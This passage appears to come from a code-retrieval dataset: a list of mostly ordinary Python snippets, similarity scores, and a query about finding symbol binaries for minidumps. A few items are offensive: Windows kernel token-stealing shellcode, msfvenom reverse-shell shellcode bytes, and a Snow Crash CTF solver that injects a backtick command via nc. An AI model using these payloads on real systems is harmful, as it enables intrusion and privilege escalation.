'\"star-diamond\"',\n 23: '\"diamond-tall\"',\n 24: '\"diamond-wide\"',\n 25: 'hourglass',\n 26: 'bowtie',\n 27: '\"circle-cross\"',\n 28: '\"circle-x\"',\n 29: '\"square-cross\"',\n 30: '\"square-x\"',\n 31: '\"diamond-cross\"',\n 32: '\"diamond-x\"',\n 33: '\"cross-thin\"',\n 34: '\"x-thin\"',\n 35: 'asterisk',\n 36: 'hash',\n 37: '\"y-up\"',\n 38: '\"y-down\"',\n 39: '\"y-left\"',\n 40: '\"y-right\"',\n 41: '\"line-ew\"',\n 42: '\"line-ns\"',\n 43: '\"line-ne\"',\n 44: '\"line-nw\"',\n 45: '\"arrow-up\"',\n 46: '\"arrow-down\"',\n 47: '\"arrow-left\"',\n 48: '\"arrow-right\"',\n 49: '\"arrow-bar-up\"',\n 50: '\"arrow-bar-down\"',\n 51: '\"arrow-bar-left\"',\n 52: '\"arrow-bar-right\"'\n }\n mash_id = _symbol_mash(base_symbol, ds_symbol)\n mash_name = id_to_name[mash_id]\n target_str = mash_name + r':{n.*?}(,needLine:!0)?(,noDot:!0)?(,noFill:!0)?}'\n swap_str = mash_name + r':{n:' + str(mash_id) + ',f:function(t){' + _get_vars(base_symbol) + _get_vars(\n ds_symbol) + f'return{_get_paths(ds_symbol)}+{_get_paths(base_symbol)};' + '}}'\n return target_str, swap_str", "def tokenstealingx86(RETVAL, extra = \"\"):\n\t(KPROCESS,APLINKS,UPID,TOKEN) = setosvariablesx86()\n\tshellcode = (\n\t\"\\x60\"\t\t\t\t\t\t\t\t\t\t# pushad\n\t\"\\x33\\xc0\"\t\t\t\t\t\t\t\t\t# xor\teax,eax\n\t\"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\"\t\t\t\t# mov\teax,DWORD PTR fs:[eax+0x124]\n\t\"\\x8b\\x40\" + KPROCESS +\t\t\t\t\t\t# mov\teax,DWORD PTR [eax+_KPROCESS]\n\t\"\\x8b\\xc8\"\t\t\t\t\t\t\t\t\t# mov\tecx,eax\n\t\"\\x8b\\x80\" + APLINKS + \"\\x00\\x00\\x00\"\t\t# mov\teax,DWORD PTR [eax+0xb8]\n\t\"\\x2d\" + APLINKS + \"\\x00\\x00\\x00\"\t\t\t# sub\teax,0xb8\n\t\"\\x83\\xb8\" + UPID + \"\\x00\\x00\\x00\\x04\"\t\t# cmp\tDWORD PTR [eax+0xb4],0x4\n\t\"\\x75\\xec\"\t\t\t\t\t\t\t\t\t# jne\t0xe\n\t\"\\x8b\\x90\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tedx,DWORD PTR [eax+0xf8]\n\t\"\\x89\\x91\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tDWORD PTR [ecx+0xf8],edx\n\t\"\\x61\"\t\t\t\t\t\t\t\t\t\t# popad\n\t)\n\t\n\tshellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack\n\t\n\tif RETVAL == \"\":\n\t\tshellcode += \"\\xc3\"\t\t\t\t\t\t#retn\n\telse:\n\t\tshellcode += \"\\xc2\" + RETVAL + \"\\x00\"\t# ret\t0x8\t\n\t\n\treturn shellcode", "def _ExtractPragmas(self, input_line, input_lines, output_stream):\n for line in input_lines[input_line - 1:]:\n pragma_match = constants.PRAGMA_RE.match(line)\n if not pragma_match:\n # Found all the pragmas.\n break\n\n # Found a pragma, strip it and pass it to the handler.\n pragma_type, pragma_value = pragma_match.groups()\n\n self._pragma_handler.HandlePragma(\n input_line,\n output_stream,\n pragma_type.strip(),\n pragma_value.strip())\n\n # Moving on to the next line.\n input_line += 1\n\n return input_line", "def test_llvm_objcopy(self):\n self.assertEqual(\n self.ndk.llvm_objcopy,\n f\"/opt/android/android-ndk/toolchains/llvm/prebuilt/{self.ndk.host_tag}/bin/llvm-objcopy\",\n )", "def set_mangling(self):\n # This one generates a program equivalent to that in BLACS/INSTALL\n # that checks the mangling in FORTRAN function symbols\n print 'Setting Fortran mangling...',\n sys.stdout.flush()\n writefile('tmpf.f',\"\"\"\n program intface\n external c_intface\n integer i\n call c_intface(i)\n stop\n end\\n\"\"\")\n writefile('tmpc.c',\"\"\"\n #include <stdio.h>\n void c_intface_(int *i){fprintf(stdout, \\\"-DADD_\\\");fflush(stdout);}\n void c_intface(int *i){fprintf(stdout, \\\"-DNOCHANGE\\\");fflush(stdout);}\n void c_intface__(int *i){fprintf(stdout, \\\"-DfcIsF2C\\\");fflush(stdout);}\n void C_INTFACE(int *i){fprintf(stdout, \\\"-DUPCASE\\\");fflush(stdout);}\\n\"\"\")\n\n ccomm = self.config.cc+' '+self.config.ccflags+' -c tmpc.c -o tmpc.o'\n fcomm = self.config.fc+' '+self.config.fcflags+' '+self.config.ldflags_fc+' tmpf.f tmpc.o -o xintface'\n\n (output, error, retz) = runShellCommand(ccomm)\n if retz:\n print '\\n\\nCOMMON: in set_mangling: cannot compile'\n print 'error is:\\n','*'*40,'\\n',error,'\\n','*'*40\n sys.exit()\n\n (output, error, retz) = runShellCommand(fcomm)\n if retz:\n print '\\n\\nCOMMON: in set_mangling: cannot compile'\n print 'error is:\\n','*'*40,'\\n',error,'\\n','*'*40\n sys.exit()\n\n comm = os.path.join(os.getcwd(),'xintface')\n (output, error, retz) = runShellCommand(comm)\n if retz:\n print '\\n\\nCOMMON: in set_mangling: cannot run xintface'\n print 'error is:\\n','*'*40,'\\n',error,'\\n','*'*40\n sys.exit()\n\n self.mangling = output\n killfiles(['xintface', 'tmpf.f', 'tmpf.o', 'tmpc.c', 'tmpc.o'])\n\n print self.mangling\n return 1;", "def postprocess_symbols(config: Config, symbols: SymbolDF) -> SymbolDF:\n files = []\n arms = []\n arm_symbols = {}\n current_file = ''\n current_arm = ''\n has_file = False\n if config['collect.prefix-file']:\n prefixes = config.get_re('collect.prefix')\n else:\n prefixes = None\n if 'type' in symbols.columns:\n for symbol in symbols.itertuples():\n if symbol.type == 'FILE':\n has_file = True\n current_file = symbol.symbol\n if prefixes:\n current_file = simplify_source(current_file, prefixes)\n\n elif symbol.type == 'NOTYPE':\n if symbol.symbol.startswith('$'):\n if current_arm or symbol.symbol in ARM_SPECIAL_SYMBOLS:\n current_arm = symbol.symbol\n arm_symbols[current_arm] = True\n files.append(current_file)\n arms.append(current_arm)\n\n if has_file:\n symbols['file'] = files\n if current_arm:\n symbols['arm'] = arms\n\n if has_file:\n symbols = symbols[symbols['type'] != 'FILE']\n if current_arm:\n syms = arm_symbols.keys()\n symbols = symbols[~symbols.symbol.isin(syms)]\n return symbols", "def __init__(self):\n self.reg = 8 * [0]\n self.ram = 256 * [0]\n self.reg[7] = 0xF4\n self.pc = 0 \n self.fl = 0b00000000\n self.fl_status = {\n \"L\": 0b00000100,\n \"G\": 0b00000010,\n \"E\": 0b00000001,\n } \n self.running = True \n self.opcodes = {\n \"NOP\": 0b00000000,\n \"LDI\": 0b10000010,\n \"PRN\": 0b01000111,\n \"ADD\": 0b10100000,\n \"MUL\": 0b10100010,\n \"HLT\": 0b00000001,\n \"PUSH\": 0b01000101,\n \"POP\": 0b01000110,\n \"CALL\": 0b01010000,\n \"RET\": 0b00010001,\n \"CMP\": 0b10100111,\n \"JMP\": 0b01010100,\n \"JEQ\": 0b01010101,\n \"JNE\": 0b01010110,\n }\n self.branch_table = {}\n self.branch_table[self.opcodes['LDI']] = self.ldi\n self.branch_table[self.opcodes['PRN']] = self.prn\n self.branch_table[self.opcodes['HLT']] = self.hlt\n self.branch_table[self.opcodes['MUL']] = self.mul\n self.branch_table[self.opcodes['PUSH']] = self.push\n self.branch_table[self.opcodes['POP']] = self.pop\n self.branch_table[self.opcodes['CALL']] = self.call\n self.branch_table[self.opcodes['RET']] = self.ret\n self.branch_table[self.opcodes['ADD']] = self.add\n self.branch_table[self.opcodes['CMP']] = self.cmp\n self.branch_table[self.opcodes['JMP']] = self.jmp\n self.branch_table[self.opcodes['JEQ']] = self.jeq\n self.branch_table[self.opcodes['JNE']] = self.jne", "def signals():\n sigdict = {'SIGABRT':'should cause (graceful) daemon exit', 'SIGCONT':'should cause daemon resume/continue after SIGHUP',\n 'SIGHUP':'should suspend/pause daemon', 'SIGINT':'should cause (graceful) daemon exit',\n 'SIGTERM':'should cause (graceful) daemon exit'}\n signal.signal(signal.SIGABRT, sighandler) \n signal.signal(signal.SIGCONT, sighandler)\n signal.signal(signal.SIGHUP, sighandler)\n signal.signal(signal.SIGINT, sighandler)\n signal.signal(signal.SIGTERM, sighandler)\n# signal.signal(signal.SIGTSTP, sighandler) ignore this for now to allow shell jobs\n# print >> FileKeyUtils.WMSlog, sigdict\n return sigdict", "def _unpack_stdlib(self):\n output_dir = self.manager.output_dir\n\n with tempfile.TemporaryDirectory() as td:\n tdp = Path(td)\n self.extract_one(self.app_archive, tdp)\n self.copy_one(tdp / \"package\", output_dir)\n\n self.maybe_timestamp(output_dir)", "def find_all_landroid_ljava_over(smali_file_list):\r\n for smali_file in smali_file_list: # For each file\r\n for smali_line in u.open_file_input(smali_file): # For each line\r\n class_match = re.search(r'^([ ]*?)\\.class(.*?)(?P<className>L([^;]*?);)', smali_line) # Match the class definition\r\n if class_match is not None:\r\n class_name = class_match.group('className') # Recover the class name\r\n if re.search(r'Landroid|Ljava', class_name): # If the class is a subclass of an SDK class\r\n yield class_name # Return the class name\r\n print smali_line, # Print back the line unchanged\r", "def __init__(__self__, *,\n other_native_crash: bool):\n pulumi.set(__self__, \"other_native_crash\", other_native_crash)", "def core_dump(self):\r\r\n loggerModem = logging.getLogger(__name__ + 'core_dump')\r\r\n cmd_l=[r'at%debug=0', r'at%debug=2']\r\r\n cmd_str='\\r\\n'.join(cmd_l)\r\r\n\r\r\n text_str = \"AT command\"\r\r\n if self.dumpfile:\r\r\n loggerModem.debug(\"Core file : %s\" % self.dumpfile)\r\r\n loggerModem.debug(\"%-15s:\\t%s\" %(text_str, cmd_str))\r\r\n with open(self.dumpfile, 'wb') as fd:\r\r\n cmd_str = cmd_str + '\\r\\n'\r\r\n self.serObj.write(cmd_str) # write a string\r\r\n len_rd=0\r\r\n response = self.serObj.read(2**16)\r\r\n while len(response)>0:\r\r\n len_rd += len(response)\r\r\n loggerModem.debug(\"read %s bytes, current_len=%s\" % (len(response), len_rd))\r\r\n fd.write(response)\r\r\n response = self.serObj.read(2**16)\r\r\n loggerModem.info(\"Created core dump: %s\" % self.dumpfile)\r\r\n else:\r\r\n loggerModem.info(\"No core dump as no dump file specified!\")", "def _decompile(*args):\n return _ida_hexrays._decompile(*args)", "def disassemble(self, script):\n return ' '.join(self.opcode_list(script))", "def do_before_dump(self):\n self.checksummer.prepare_checksums()", "def _getOldCodeList(self, line):\n if line.startswith('+'):\n return (None, self.color)\n if line.startswith('-'):\n return (' ' + line[1:], self.color)\n return (line, self.color)", "def find_all_landroid_ljava_over(smali_file_list):\n for smali_file in smali_file_list: # For each file\n for smali_line in u.open_file_input(smali_file): # For each line\n class_match = re.search(r'^([ ]*?)\\.class(.*?)(?P<className>L([^;]*?);)', smali_line) # Match the class definition\n if class_match is not None:\n class_name = class_match.group('className') # Recover the class name\n if re.search(r'Landroid|Ljava', class_name): # If the class is a subclass of an SDK class\n yield class_name # Return the class name\n print smali_line, # Print back the line unchanged", "def pybind11(self, line, cell):\n\n line = line.strip().rstrip(';')\n args = self.pybind11.parser.parse_args(shlex.split(line))\n code = self.format_code(cell)\n module = 'pybind11_{}'.format(self.compute_hash(code, args))\n libfile = cache_path(module + ext_suffix())\n need_rebuild = not os.path.isfile(libfile) or args.force\n if need_rebuild:\n source = self.save_source(code, module)\n self.build_module(module, source, args)\n self.import_module(module, libfile, import_symbols=not args.module)", "def code():", "def add_shellcode() -> bytes:\n # msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread lhost=eth0 lport=4444 \n # -f c -b \"\\x00\\x20\\x25\\x2b\\x2f\\x5c\"\n #Payload size: 351 bytes\n shellcode = b\"\"\n shellcode += b\"\\xba\\x6e\\x70\\x53\\xc6\\xdb\\xc4\\xd9\\x74\\x24\\xf4\\x5e\\x31\\xc9\\xb1\"\n shellcode += b\"\\x52\\x31\\x56\\x12\\x03\\x56\\x12\\x83\\xa8\\x74\\xb1\\x33\\xc8\\x9d\\xb7\"\n shellcode += b\"\\xbc\\x30\\x5e\\xd8\\x35\\xd5\\x6f\\xd8\\x22\\x9e\\xc0\\xe8\\x21\\xf2\\xec\"\n shellcode += b\"\\x83\\x64\\xe6\\x67\\xe1\\xa0\\x09\\xcf\\x4c\\x97\\x24\\xd0\\xfd\\xeb\\x27\"\n shellcode += b\"\\x52\\xfc\\x3f\\x87\\x6b\\xcf\\x4d\\xc6\\xac\\x32\\xbf\\x9a\\x65\\x38\\x12\"\n shellcode += b\"\\x0a\\x01\\x74\\xaf\\xa1\\x59\\x98\\xb7\\x56\\x29\\x9b\\x96\\xc9\\x21\\xc2\"\n shellcode += b\"\\x38\\xe8\\xe6\\x7e\\x71\\xf2\\xeb\\xbb\\xcb\\x89\\xd8\\x30\\xca\\x5b\\x11\"\n shellcode += b\"\\xb8\\x61\\xa2\\x9d\\x4b\\x7b\\xe3\\x1a\\xb4\\x0e\\x1d\\x59\\x49\\x09\\xda\"\n shellcode += b\"\\x23\\x95\\x9c\\xf8\\x84\\x5e\\x06\\x24\\x34\\xb2\\xd1\\xaf\\x3a\\x7f\\x95\"\n shellcode += b\"\\xf7\\x5e\\x7e\\x7a\\x8c\\x5b\\x0b\\x7d\\x42\\xea\\x4f\\x5a\\x46\\xb6\\x14\"\n shellcode += b\"\\xc3\\xdf\\x12\\xfa\\xfc\\x3f\\xfd\\xa3\\x58\\x34\\x10\\xb7\\xd0\\x17\\x7d\"\n shellcode += b\"\\x74\\xd9\\xa7\\x7d\\x12\\x6a\\xd4\\x4f\\xbd\\xc0\\x72\\xfc\\x36\\xcf\\x85\"\n shellcode += b\"\\x03\\x6d\\xb7\\x19\\xfa\\x8e\\xc8\\x30\\x39\\xda\\x98\\x2a\\xe8\\x63\\x73\"\n shellcode += b\"\\xaa\\x15\\xb6\\xd4\\xfa\\xb9\\x69\\x95\\xaa\\x79\\xda\\x7d\\xa0\\x75\\x05\"\n shellcode += b\"\\x9d\\xcb\\x5f\\x2e\\x34\\x36\\x08\\x91\\x61\\x5b\\xab\\x79\\x70\\x9b\\x3a\"\n shellcode += b\"\\x26\\xfd\\x7d\\x56\\xc6\\xab\\xd6\\xcf\\x7f\\xf6\\xac\\x6e\\x7f\\x2c\\xc9\"\n shellcode += b\"\\xb1\\x0b\\xc3\\x2e\\x7f\\xfc\\xae\\x3c\\xe8\\x0c\\xe5\\x1e\\xbf\\x13\\xd3\"\n shellcode += b\"\\x36\\x23\\x81\\xb8\\xc6\\x2a\\xba\\x16\\x91\\x7b\\x0c\\x6f\\x77\\x96\\x37\"\n shellcode += b\"\\xd9\\x65\\x6b\\xa1\\x22\\x2d\\xb0\\x12\\xac\\xac\\x35\\x2e\\x8a\\xbe\\x83\"\n shellcode += b\"\\xaf\\x96\\xea\\x5b\\xe6\\x40\\x44\\x1a\\x50\\x23\\x3e\\xf4\\x0f\\xed\\xd6\"\n shellcode += b\"\\x81\\x63\\x2e\\xa0\\x8d\\xa9\\xd8\\x4c\\x3f\\x04\\x9d\\x73\\xf0\\xc0\\x29\"\n shellcode += b\"\\x0c\\xec\\x70\\xd5\\xc7\\xb4\\x91\\x34\\xcd\\xc0\\x39\\xe1\\x84\\x68\\x24\"\n shellcode += b\"\\x12\\x73\\xae\\x51\\x91\\x71\\x4f\\xa6\\x89\\xf0\\x4a\\xe2\\x0d\\xe9\\x26\"\n shellcode += b\"\\x7b\\xf8\\x0d\\x94\\x7c\\x29\"\n return shellcode", "def dump_from_release(input_bytes, key):\n idx = 0\n while True:\n idx = input_bytes.find(LINUX_BANNER_PREFIX, idx)\n if idx < 0:\n return None\n\n value = get_from_release(input_bytes, idx, key)\n if value:\n return value.encode()\n\n idx += len(LINUX_BANNER_PREFIX)", "def solve_level11(_, snow_crash):\n\n proc = snow_crash.process([\"/bin/nc\", \"localhost\", \"5151\"])\n proc.sendline(\"`getflag` > /tmp/token11\")\n output = snow_crash[\"cat /tmp/token11; rm -f /tmp/token11\"]\n return \"token\", u.misc.parse_token(output)", "def _find_processing_instructions(self):\n pass", "def reset_graphics_dumpsys(device, package_name):\n print 'Clearing gfxinfo on device'\n device.shell('dumpsys gfxinfo ' + package_name + ' reset')", "def _platform_compatible():\r\n raise NotImplementedError", "def testPullMinidumpsLockFilesIgnored(self):\n def GetDumpLocation(_=None):\n return '/sdcard/dumps/'\n\n platform_backend = self._browser_backend.platform_backend\n platform_backend.GetDumpLocation = GetDumpLocation\n remote_path = posixpath.join(GetDumpLocation(), 'Crashpad', 'pending')\n self._browser_backend.device.RunShellCommand(['mkdir', '-p', remote_path])\n remote_dump_file = posixpath.join(remote_path, 'test_dump')\n remote_lock_file = posixpath.join(remote_path, 'test_file.lock')\n self._browser_backend.device.RunShellCommand(\n ['touch', remote_dump_file])\n self._browser_backend.device.RunShellCommand(\n ['touch', remote_lock_file])\n try:\n self._browser_backend.PullMinidumps()\n finally:\n self._browser_backend.device.RemovePath(GetDumpLocation(), recursive=True)\n\n local_path = os.path.join(\n self._browser_backend._tmp_minidump_dir, 'test_dump')\n self.assertTrue(os.path.exists(local_path))\n local_path = os.path.join(\n self._browser_backend._tmp_minidump_dir, 'test_file.lock')\n self.assertFalse(os.path.exists(local_path))", "def visit_Python(self, node):\n # This compiles the given Python ast into a Python code object\n # then disassembles it into a byteplay code object. This allows\n # us to interleave the instructions with those generated for\n # the rest of the module and then compile a single unified \n # code object.\n py_code = compile(node.py_ast, self.filename, mode='exec')\n bpc = Code.from_code(py_code)\n # Skip the SetLineo and ReturnValue codes\n self.code_ops.extend(bpc.code[1:-2])", "def _DisassembleFunc(self, symbol, elf_path=None, use_pager=None,\n to_file=None):\n assert not symbol.IsGroup()\n assert symbol.address and symbol.section_name == models.SECTION_TEXT\n assert not symbol.IsDelta(), ('Cannot disasseble a Diff\\'ed symbol. Try '\n 'passing .before_symbol or .after_symbol.')\n size_info = self._SizeInfoForSymbol(symbol)\n container = symbol.container\n elf_path = self._ElfPathForSymbol(size_info, container, elf_path)\n # Always use Android NDK's objdump because llvm-objdump does not print\n # the target of jump instructions, which is really useful.\n output_directory_finder = self._output_directory_finder\n if not output_directory_finder.Tentative():\n output_directory_finder = path_util.OutputDirectoryFinder(\n any_path_within_output_directory=elf_path)\n if output_directory_finder.Tentative():\n # Running objdump from an output directory means that objdump can\n # interleave source file lines in the disassembly.\n objdump_pwd = output_directory_finder.Finalized()\n else:\n # If we do not know/guess the output directory, run from any directory 2\n # levels below src since it is better than a random cwd (because usually\n # source file paths are relative to an output directory two levels below\n # src and start with ../../).\n objdump_pwd = path_util.FromToolsSrcRoot('tools', 'binary_size')\n\n arch = readelf.ArchFromElf(elf_path)\n objdump_path = path_util.GetDisassembleObjDumpPath(arch)\n args = [\n os.path.relpath(objdump_path, objdump_pwd),\n '--disassemble',\n '--source',\n '--line-numbers',\n '--demangle',\n '--start-address=0x%x' % symbol.address,\n '--stop-address=0x%x' % symbol.end_address,\n os.path.relpath(elf_path, objdump_pwd),\n ]\n\n # pylint: disable=unexpected-keyword-arg\n proc = subprocess.Popen(args,\n stdout=subprocess.PIPE,\n encoding='utf-8',\n cwd=objdump_pwd)\n lines = itertools.chain(('Showing disassembly for %r' % symbol,\n 'Command: %s' % ' '.join(args)),\n (l.rstrip() for l in proc.stdout))\n _WriteToStream(lines, use_pager=use_pager, to_file=to_file)\n proc.kill()", "def horde_cleanup(self):" ]
[ "0.5797563", "0.53851175", "0.5382028", "0.5153331", "0.4875175", "0.48596218", "0.47921395", "0.4589166", "0.45467687", "0.45267266", "0.45106924", "0.44272697", "0.441203", "0.43683136", "0.43274632", "0.43264234", "0.43178105", "0.43031862", "0.43031862", "0.42946658", "0.42870143", "0.42786124", "0.42674002", "0.42580718", "0.42565688", "0.42432654", "0.42379734", "0.42342746", "0.42235175", "0.42225", "0.42204675", "0.42199293", "0.42064625", "0.41788673", "0.41781178", "0.41768244", "0.41718787", "0.41611782", "0.41535166", "0.41517496", "0.4148658", "0.41459236", "0.4144224", "0.41300374", "0.41289657", "0.4124308", "0.40852118", "0.4083701", "0.4076595", "0.4075873", "0.40754977", "0.40588358", "0.40566203", "0.4054296", "0.40534574", "0.40534574", "0.40534574", "0.40430617", "0.40386978", "0.40319353", "0.40309614", "0.40280017", "0.40280017", "0.40195665", "0.4017166", "0.40160233", "0.40148652", "0.40083423", "0.40069604", "0.40048748", "0.40047914", "0.40042943", "0.40000632", "0.39996386", "0.39992785", "0.39989924", "0.3996089", "0.39903298", "0.39888784", "0.39792103", "0.3974279", "0.39740086", "0.39704606", "0.39659464", "0.39656046", "0.39638522", "0.3956545", "0.39533737", "0.39532027", "0.39524335", "0.39523116", "0.39461637", "0.39435205", "0.39415187", "0.3937768", "0.39342228", "0.39285588", "0.39218563", "0.3921025", "0.39184237" ]
0.6551352
0
Returns a list of paths to binaries where symbols may be located.
def GetSymbolBinaries(self, minidump): libraries = self._ExtractLibraryNamesFromDump(minidump) symbol_binary_dir = self._GetSymbolBinaryDirectory(minidump, libraries) if not symbol_binary_dir: return [] return [os.path.join(symbol_binary_dir, lib) for lib in libraries]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def find_binaries():\n\n builddir = Path(__file__).parent.parent / \"builddir\"\n\n bins = []\n\n for folder in [\"examples\", \"tests\", \"tools\"]:\n for path in sorted((builddir / folder).rglob(\"*\")):\n if path.stem.startswith(\"xnvme_single\"):\n continue\n if path.stem.startswith(\"xnvme_dev\"):\n continue\n if path.stem.startswith(\"xnvme_enum\"):\n continue\n if path.is_file() and path.stat().st_mode & os.X_OK:\n bins.append(path.name)\n\n return bins", "def _GetDefaultBinPathExcludes(self):\n if sys.platform == \"win32\":\n import cx_Freeze.util\n systemDir = cx_Freeze.util.GetSystemDir()\n windowsDir = cx_Freeze.util.GetWindowsDir()\n return [windowsDir, systemDir, os.path.join(windowsDir, \"WinSxS\")]\n elif sys.platform == \"darwin\":\n return [\"/lib\", \"/usr/lib\", \"/System/Library/Frameworks\"]\n else:\n return [\"/lib\", \"/lib32\", \"/lib64\", \"/usr/lib\", \"/usr/lib32\",\n \"/usr/lib64\"]", "def dir_bin():\n return abspath('bin')", "def _GetSymbolBinaryDirectory(self, minidump, libraries):\n if minidump in self._minidump_symbol_binaries_directories:\n return self._minidump_symbol_binaries_directories[minidump]\n\n # Get the processor architecture reported by the minidump.\n arch = None\n matcher = re.compile(_PROCESSOR_ARCH_REGEX)\n for line in self._GetMinidumpDumpOutput(minidump).splitlines():\n match = matcher.match(line)\n if match:\n arch = match.groupdict()['arch'].lower()\n break\n if not arch:\n logging.error('Unable to find processor architecture for minidump %s',\n minidump)\n self._minidump_symbol_binaries_directories[minidump] = None\n return None\n if arch not in _BREAKPAD_ARCH_TO_FILE_REGEX:\n logging.error(\n 'Unsupported processor architecture %s for minidump %s. This is '\n 'likely fixable by adding the correct mapping for the architecture '\n 'in android_minidump_symbolizer._BREAKPAD_ARCH_TO_FILE_REGEX.',\n arch, minidump)\n self._minidump_symbol_binaries_directories[minidump] = None\n return None\n\n # Look for a directory that contains binaries with the correct architecture.\n matcher = re.compile(_BREAKPAD_ARCH_TO_FILE_REGEX[arch])\n symbol_dir = None\n for symbol_subdir in _POSSIBLE_SYMBOL_BINARY_DIRECTORIES:\n possible_symbol_dir = os.path.join(self._build_dir, symbol_subdir)\n if not os.path.exists(possible_symbol_dir):\n continue\n for f in os.listdir(possible_symbol_dir):\n if f not in libraries:\n continue\n binary_path = os.path.join(possible_symbol_dir, f)\n stdout = subprocess.check_output(\n ['file', binary_path], stderr=subprocess.STDOUT)\n if matcher.match(stdout):\n symbol_dir = possible_symbol_dir\n break\n\n if not symbol_dir:\n logging.error(\n 'Unable to find suitable symbol binary directory for architecture %s.'\n 'This is likely fixable by adding the correct directory to '\n 'android_minidump_symbolizer._POSSIBLE_SYMBOL_BINARY_DIRECTORIES.',\n arch)\n self._minidump_symbol_binaries_directories[minidump] = symbol_dir\n return symbol_dir", "def get_symbols(obj_path):\n cmd = ['nm', obj_path]\n res = subprocess.run(cmd, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, check=True)\n\n return res.stdout.decode()", "def buildExecutablesList( path ):\n\n result = []\n for item in os.listdir( path ):\n candidate = path + item\n if not os.path.islink( candidate ):\n continue # Not a symlink at all\n if not os.path.exists( candidate ):\n logging.warning( \"Broken symlink detected: \" + candidate )\n continue # Broken link\n if not os.access( candidate, os.X_OK ):\n logging.warning( \"Symlink to a non-executable file: \" + candidate )\n continue # No permissions to execute\n\n result.append( candidate )\n return result", "def locate_scripts():\n scripts = []\n bin_dir = os.path.join(os.getcwd(), 'bin')\n if not os.path.isdir(bin_dir):\n return scripts\n for item in os.listdir(bin_dir):\n full_path = os.path.join(bin_dir, item)\n if os.path.isfile(full_path):\n with open(full_path) as f:\n first_line = next(f)\n if first_line.startswith('#!'):\n scripts.append(full_path)\n return scripts", "def _binaries_to_symbolize(self):\n raise NotImplementedError()", "def getpaths(self,libname):\n if os.path.isabs(libname):\n yield libname\n else:\n # FIXME / TODO return '.' and os.path.dirname(__file__)\n for path in self.getplatformpaths(libname):\n yield path\n\n path = ctypes.util.find_library(libname)\n if path: yield path", "def getpaths(self,libname):\n if os.path.isabs(libname):\n yield libname\n else:\n # FIXME / TODO return '.' and os.path.dirname(__file__)\n for path in self.getplatformpaths(libname):\n yield path\n\n path = ctypes.util.find_library(libname)\n if path: yield path", "def filepaths(self) -> Dict[str, 'BinPackageFile']:\n return self._get_package_files()", "def binaries_path(self):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)", "def get_symbols(self):\n symbols = os.environ.get('SYMBOLS', 'btc,eth')\n if not symbols:\n return 'btc,eth'\n return symbols", "def pathext_list():\n return (os.environ.get(\"PATHEXT\") or \"\").split(os.pathsep)", "def find_all_pythons():\n \n allpys = []\n \n # split PATH according to platform rules\n pathlist = string.split( os.environ['PATH'], os.pathsep )\n\n # search PATH, excluding nonexistant dirs\n for path in filter( os.path.isdir, pathlist ):\n allpys.extend( find_pythons_in_dir( path ) )\n\n # check the win32 registry, as appropriate\n allpys.extend( get_pythons_from_registry() )\n\n # and of course I'm running under a Python, in case\n # no others were found\n allpys.append( os.path.abspath(sys.executable) )\n \n return allpys", "def path_list():\n return (os.environ.get(\"PATH\", None) or os.defpath).split(os.pathsep)", "def _executable_names(executable):\n\n if os.name == 'nt':\n pathext = os.environ.get('PATHEXT', '').split(os.pathsep)\n for ext in pathext:\n yield executable + ext\n\n else:\n yield executable", "def binpath(self):\n return self._query_config()['binpath']", "def get_path(self):\r\n path = [\"/bin\", \"/usr/bin\", \"/usr/local/bin\"]\r\n if \"PATH\" in os.environ:\r\n p = os.environ[\"PATH\"]\r\n if p:\r\n path = p.split(os.pathsep)\r\n return path", "def build_filelist(basepath):\n log.info(\"Building list of files containing EDM symbols in %s\", basepath)\n symbol_files = []\n for dir_path, _, filenames in os.walk(basepath):\n for filename in filenames:\n filepath = os.path.join(dir_path, filename)\n if filename.endswith(\".opi\") and utils.grep(filepath, \"EDM Symbol\"):\n symbol_files.append(filepath)\n\n return symbol_files", "def binpath(self):\n return self.__bin", "def binaries(gmxpath, gmxsuff):\n def gmx_path(binary_path):\n return os.path.join(gmxpath, binary_path + gmxsuff)\n\n if which('gmx_d'):\n logger.debug(\"Using double precision binaries for gromacs\")\n main_binary = gmx_path('gmx_d')\n grompp_bin = [main_binary, 'grompp']\n mdrun_bin = [main_binary, 'mdrun']\n genergy_bin = [main_binary, 'energy']\n elif which('grompp_d') and which('mdrun_d') and which('g_energy_d'):\n logger.debug(\"Using double precision binaries\")\n grompp_bin = [gmx_path('grompp_d')]\n mdrun_bin = [gmx_path('mdrun_d')]\n genergy_bin = [gmx_path('g_energy_d')]\n elif which('gmx'):\n logger.debug(\"Using double precision binaries\")\n main_binary = gmx_path('gmx')\n grompp_bin = [main_binary, 'grompp']\n mdrun_bin = [main_binary, 'mdrun']\n genergy_bin = [main_binary, 'energy']\n elif which('grompp') and which('mdrun') and which('g_energy'):\n logger.debug(\"Using single precision binaries\")\n grompp_bin = [gmx_path('grompp')]\n mdrun_bin = [gmx_path('mdrun')]\n genergy_bin = [gmx_path('g_energy')]\n else:\n raise IOError('Unable to find gromacs executables.')\n return grompp_bin, mdrun_bin, genergy_bin", "def syspaths(self):\n res = []\n for path, jsmodule in self.jsmodules.items():\n if jsmodule.js_lib_path != \"\":\n js_lib_path = os.path.dirname(jsmodule.js_lib_path.rstrip(\"/\")) # get parent\n if not js_lib_path in res:\n res.append(js_lib_path)\n return res", "def get_rpaths(pkg):\n rpaths = [pkg.prefix.lib, pkg.prefix.lib64]\n deps = get_rpath_deps(pkg)\n rpaths.extend(d.prefix.lib for d in deps if os.path.isdir(d.prefix.lib))\n rpaths.extend(d.prefix.lib64 for d in deps if os.path.isdir(d.prefix.lib64))\n # Second module is our compiler mod name. We use that to get rpaths from\n # module show output.\n if pkg.compiler.modules and len(pkg.compiler.modules) > 1:\n rpaths.append(path_from_modules([pkg.compiler.modules[1]]))\n return list(dedupe(filter_system_paths(rpaths)))", "def get_rpaths(dylib_path):\n load_cmds = get_load_commands(dylib_path)\n rpath_cmds = filter(lambda cmd: cmd.name == 'LC_RPATH', load_cmds)\n path_re = re.compile('path (?P<rpath>.*) \\(.*\\)')\n\n rpaths = []\n for cmd in rpath_cmds:\n for line in cmd.lines:\n match = path_re.search(line)\n if match:\n rpaths.append(match.group('rpath'))\n return rpaths", "def library_search_path(self, pedantic=False):\n return []", "def 